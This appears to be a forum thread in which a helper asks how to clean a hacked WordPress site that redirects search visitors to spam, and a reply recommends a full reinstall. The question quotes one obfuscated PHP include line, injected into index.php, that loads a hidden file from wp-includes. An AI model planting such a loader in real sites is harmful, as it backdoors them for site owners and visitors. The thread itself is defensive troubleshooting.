Hi I don’t use wordpress too much but trying to help un-fuck a friend’s site that has been hacked. If you search google for the site, click the link that google provides, it will intermittently redirect to a spam site. This hasn’t been reproduced when accessing the site directly. Doing some research I have found an admin user named deleted-XXXXXXXXX (the Xs being random letters/numbers). Pretty sure this is the account created by the hacker. Question is now, how to proceed? Is it possible to see all the files that were modified by that suspicious user?
This is also near the top of index.php (including the weird escape characters):
u/include /\*gn7\*/(“/var/www/htm\\x6c/wp\\x2dinc\\x6cudes/b\\x6cocks/heading/.2a26f802.oti”);
Does that look legit? Thinking not but I don’t have the familiarity to really say for sure.
​
[ad_2]
There’s no point doing any investigating – site has been hacked and you need to remove the vulnerability and clean the malware. All WP malware is generally of the same type.
99% of the time malware infections are the result of plugins not being updated, abandoned, or nulled plugins/theme was used.
Google “how to clean WordPress malware” – there are dozens of guides on how to do it. Essentially you’re deleting everything except /wp-content/uploads and reinstalling WordPress, the theme and plugins from a clean, known source (not backups). Most of the time it’s a fairly simple job.